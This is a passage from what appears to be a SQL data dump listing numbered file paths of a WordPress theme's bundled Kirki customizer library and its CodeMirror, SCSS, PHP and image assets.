ent/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/css/scss_test.js'),(5936,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/css/test.js'),(5937,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/haml/haml.js'),(5938,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/haml/index.html'),(5939,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/haml/test.js'),(5940,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/htmlembedded/htmlembedded.js'),(5941,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/htmlembedded/index.html'),(5942,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/htmlmixed/htmlmixed.js'),(5943,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/htmlmixed/index.html'),(5944,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/index.html'),(5945,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/index.html'),(5946,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/javascript.js'),(5947,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/json-ld.html'),(5948,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/test.js'),(5949,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/typescript.html'),(5950,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/markdown/index.html'),(5951,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/markdown/markdown.js'),(5952,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/markdown/test.js'),(5953,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/meta.js'),(5954,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/php/index.html'),(5955,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/php/php.js'),(5956,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/php/test.js'),(5957,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/sass/index.html'),(5958,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/sass/sass.js'),(5959,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/smarty/index.html'),(5960,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/smarty/smarty.js'),(5961,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/sql/index.html'),(5962,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/sql/sql.js'),(5963,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/stylus/index.html'),(5964,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/stylus/stylus.js'),(5965,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/textile/index.html'),(5966,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/textile/test.js'),(5967,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/textile/textile.js'),(5968,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/twig/index.html'),(5969,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/twig/twig.js'),(5970,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/xml/index.html'),(5971,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/xml/test.js'),(5972,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/xml/xml.js'),(5973,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/yaml/index.html'),(5974,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/yaml/yaml.js'),(5975,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/3024-day.css'),(5976,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/3024-night.css'),(5977,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/abcdef.css'),(5978,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/ambiance-mobile.css'),(5979,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/ambiance.css'),(5980,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/base16-dark.css'),(5981,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/base16-light.css'),(5982,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/bespin.css'),(5983,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/blackboard.css'),(5984,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/cobalt.css'),(5985,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/colorforth.css'),(5986,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/dracula.css'),(5987,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/eclipse.css'),(5988,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/elegant.css'),(5989,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/erlang-dark.css'),(5990,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/hopscotch.css'),(5991,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/icecoder.css'),(5992,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/isotope.css'),(5993,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/kirki-dark.css'),(5994,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/kirki-light.css'),(5995,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/lesser-dark.css'),(5996,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/liquibyte.css'),(5997,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/material.css'),(5998,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/mbo.css'),(5999,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/mdn-like.css'),(6000,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/midnight.css'),(6001,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/monokai.css'),(6002,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/neat.css'),(6003,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/neo.css'),(6004,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/night.css'),(6005,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/paraiso-dark.css'),(6006,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/paraiso-light.css'),(6007,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/pastel-on-dark.css'),(6008,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/railscasts.css'),(6009,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/rubyblue.css'),(6010,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/seti.css'),(6011,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/solarized.css'),(6012,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/the-matrix.css'),(6013,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/tomorrow-night-bright.css'),(6014,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/tomorrow-night-eighties.css'),(6015,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/ttcn.css'),(6016,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/twilight.css'),(6017,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/vibrant-ink.css'),(6018,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/xq-dark.css'),(6019,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/xq-light.css'),(6020,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/yeti.css'),(6021,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/zenburn.css'),(6022,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/selectize.js'),(6023,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/serialize.js'),(6024,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/tinymce.plugin.code.js'),(6025,'wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js'),(6026,'wp-content/themes/wp-simple/inc/kirki/assets/json/webfonts.php'),(6027,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/checkbox.scss'),(6028,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/code.scss'),(6029,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/color-palette.scss'),(6030,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/color.scss'),(6031,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/dashicons.scss'),(6032,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/date.scss'),(6033,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/datetime.scss'),(6034,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/dimension.scss'),(6035,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/editor.scss'),(6036,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/generic.scss'),(6037,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/multicheck.scss'),(6038,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/multicolor.scss'),(6039,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/number.scss'),(6040,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/palette.scss'),(6041,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/radio-buttonset.scss'),(6042,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/radio-image.scss'),(6043,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/radio.scss'),(6044,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/repeater.scss'),(6045,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/select.scss'),(6046,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/slider.scss'),(6047,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/sortable.scss'),(6048,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/spacing.scss'),(6049,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/switch.scss'),(6050,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/toggle.scss'),(6051,'wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/typography.scss'),(6052,'wp-content/themes/wp-simple/inc/kirki/assets/scss/customizer.scss'),(6053,'wp-content/themes/wp-simple/inc/kirki/assets/scss/global.scss'),(6054,'wp-content/themes/wp-simple/inc/kirki/assets/scss/panels/expanded.scss'),(6055,'wp-content/themes/wp-simple/inc/kirki/assets/scss/sections/expanded.scss'),(6056,'wp-content/themes/wp-simple/inc/kirki/assets/scss/sections/hover.scss'),(6057,'wp-content/themes/wp-simple/inc/kirki/assets/scss/tooltips.scss'),(6058,'wp-content/themes/wp-simple/inc/kirki/assets/xml/colourlovers-top.xml'),(6059,'wp-content/themes/wp-simple/inc/kirki/autoloader.php'),(6060,'wp-content/themes/wp-simple/inc/kirki/composer.json'),(6061,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-active-callback.php'),(6062,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-config.php'),(6063,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-control.php'),(6064,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-customize-control.php'),(6065,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-enqueue.php'),(6066,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-explode-background-field.php'),(6067,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-field.php'),(6068,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-fonts-google.php'),(6069,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-fonts.php'),(6070,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-helper.php'),(6071,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-init.php'),(6072,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-l10n.php'),(6073,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-panel.php'),(6074,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-sanitize-values.php'),(6075,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-scripts-registry.php'),(6076,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-section.php'),(6077,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-selective-refresh.php'),(6078,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-settings.php'),(6079,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-toolkit.php'),(6080,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-values.php'),(6081,'wp-content/themes/wp-simple/inc/kirki/includes/class-kirki.php'),(6082,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php'),(6083,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-code-control.php'),(6084,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-color-alpha-control.php'),(6085,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-color-control.php'),(6086,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php'),(6087,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-custom-control.php'),(6088,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php'),(6089,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-date-control.php'),(6090,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-datetime-control.php'),(6091,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php'),(6092,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php'),(6093,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-editor-control.php'),(6094,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-generic-control.php'),(6095,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php'),(6096,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php'),(6097,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-number-control.php'),(6098,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-palette-control.php'),(6099,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-preset-control.php'),(6100,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php'),(6101,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-radio-control.php'),(6102,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php'),(6103,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php'),(6104,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-select-control.php'),(6105,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-slider-control.php'),(6106,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php'),(6107,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php'),(6108,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-switch-control.php'),(6109,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php'),(6110,'wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-typography-control.php'),(6111,'wp-content/themes/wp-simple/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-icons.php'),(6112,'wp-content/themes/wp-simple/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-loading.php'),(6113,'wp-content/themes/wp-simple/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-tooltips.php'),(6114,'wp-content/themes/wp-simple/inc/kirki/includes/deprecated.php'),(6115,'wp-content/themes/wp-simple/inc/kirki/includes/dynamic-css.php'),(6116,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-checkbox.php'),(6117,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-code.php'),(6118,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-color-alpha.php'),(6119,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-color-palette.php'),(6120,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-color.php'),(6121,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-custom.php'),(6122,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-dashicons.php'),(6123,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-date.php'),(6124,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-dimension.php'),(6125,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php'),(6126,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-editor.php'),(6127,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-generic.php'),(6128,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-group-title.php'),(6129,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-image.php'),(6130,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-kirki-generic.php'),(6131,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-multicheck.php'),(6132,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-multicolor.php'),(6133,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-number.php'),(6134,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-palette.php'),(6135,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-preset.php'),(6136,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php'),(6137,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-radio-image.php'),(6138,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-radio.php'),(6139,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-select.php'),(6140,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-select2-multiple.php'),(6141,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-select2.php'),(6142,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-slider.php'),(6143,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-sortable.php'),(6144,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-spacing.php'),(6145,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-switch.php'),(6146,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-text.php'),(6147,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-textarea.php'),(6148,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-toggle.php'),(6149,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-typography.php'),(6150,'wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-upload.php'),(6151,'wp-content/themes/wp-simple/inc/kirki/includes/lib/class-aricolor.php'),(6152,'wp-content/themes/wp-simple/inc/kirki/includes/lib/class-kirki-color.php'),(6153,'wp-content/themes/wp-simple/inc/kirki/includes/lib/class-kirki-colourlovers.php'),(6154,'wp-content/themes/wp-simple/inc/kirki/includes/output/class-kirki-output.php'),(6155,'wp-content/themes/wp-simple/inc/kirki/includes/output/control/class-kirki-output-control-spacing.php'),(6156,'wp-content/themes/wp-simple/inc/kirki/includes/output/control/class-kirki-output-control-typography.php'),(6157,'wp-content/themes/wp-simple/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php'),(6158,'wp-content/themes/wp-simple/inc/kirki/includes/output/field/class-kirki-output-field-spacing.php'),(6159,'wp-content/themes/wp-simple/inc/kirki/includes/output/field/class-kirki-output-field-typography.php'),(6160,'wp-content/themes/wp-simple/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php'),(6161,'wp-content/themes/wp-simple/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php'),(6162,'wp-content/themes/wp-simple/inc/kirki/includes/output/property/class-kirki-output-property-font-family.php'),(6163,'wp-content/themes/wp-simple/inc/kirki/includes/output/property/class-kirki-output-property.php'),(6164,'wp-content/themes/wp-simple/inc/kirki/includes/panels/class-kirki-panels-default-panel.php'),(6165,'wp-content/themes/wp-simple/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php'),(6166,'wp-content/themes/wp-simple/inc/kirki/includes/scripts/class-kirki-scripts-icons.php'),(6167,'wp-content/themes/wp-simple/inc/kirki/includes/scripts/class-kirki-scripts-loading.php'),(6168,'wp-content/themes/wp-simple/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php'),(6169,'wp-content/themes/wp-simple/inc/kirki/includes/sections/class-kirki-sections-default-section.php'),(6170,'wp-content/themes/wp-simple/inc/kirki/includes/sections/class-kirki-sections-expanded-section.php'),(6171,'wp-content/themes/wp-simple/inc/kirki/includes/sections/class-kirki-sections-hover-section.php'),(6172,'wp-content/themes/wp-simple/inc/kirki/includes/settings/class-kirki-settings-default-setting.php'),(6173,'wp-content/themes/wp-simple/inc/kirki/includes/settings/class-kirki-settings-repeater-setting.php'),(6174,'wp-content/themes/wp-simple/inc/kirki/includes/styles/class-kirki-styles-customizer.php'),(6175,'wp-content/themes/wp-simple/inc/kirki/includes/styles/class-kirki-styles-frontend.php'),(6176,'wp-content/themes/wp-simple/inc/kirki/includes/styles/class-kirki-styles-output-css.php'),(6177,'wp-content/themes/wp-simple/inc/kirki/includes/webfonts.php'),(6178,'wp-content/themes/wp-simple/inc/kirki/kirki/LICENSE'),(6179,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer-dynamic-css-colors.php'),(6180,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer-dynamic-css-width.php'),(6181,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer-dynamic-css.php'),(6182,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer.css'),(6183,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer.css.map'),(6184,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/hint.css'),(6185,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/kirki-styles.css'),(6186,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/select2.min.css'),(6187,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/transparency-grid.png'),(6188,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/1c.png'),(6189,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/2cl.png'),(6190,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/2cr.png'),(6191,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/3cl.png'),(6192,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/3cm.png'),(6193,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/3cr.png'),(6194,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/jquery.fs.stepper-arrows.png'),(6195,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/kirki-bottom.png'),(6196,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/kirki-bottom.svg'),(6197,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/kirki-logo.svg'),(6198,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/kirki-toolkit.png'),(6199,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/branding.js'),(6200,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/checkbox.js'),(6201,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/code.js'),(6202,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/color-palette.js'),(6203,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/color.js'),(6204,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/custom.js'),(6205,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/dashicons.js'),(6206,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/date.js'),(6207,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/dimension.js'),(6208,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/dropdown-pages.js'),(6209,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/editor.js'),(6210,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/generic.js'),(6211,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/multicheck.js'),(6212,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/multicolor.js'),(6213,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/number.js'),(6214,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/palette.js'),(6215,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/preset.js'),(6216,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/radio-buttonset.js'),(6217,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/radio-image.js'),(6218,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/radio.js'),(6219,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/repeater.js'),(6220,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/select.js'),(6221,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/slider.js'),(6222,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/sortable.js'),(6223,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/spacing.js'),(6224,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/switch.js'),(6225,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/toggle.js'),(6226,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/typography.js'),(6227,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/functions/set-setting-value.js'),(6228,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/functions/validate-css-value.js'),(6229,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/l10n.js'),(6230,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/postmessage.js'),(6231,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/reset.js'),(6232,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/tooltip.js'),(6233,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/AUTHORS'),(6234,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/LICENSE'),(6235,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/README.md'),(6236,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/comment/comment.js'),(6237,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/comment/continuecomment.js'),(6238,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/dialog/dialog.css'),(6239,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/dialog/dialog.js'),(6240,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/autorefresh.js'),(6241,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.css'),(6242,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.js'),(6243,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/panel.js'),(6244,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/placeholder.js'),(6245,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/rulers.js'),(6246,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/edit/closebrackets.js'),(6247,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/edit/closetag.js'),(6248,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/edit/continuelist.js'),(6249,'wp-content/themes/w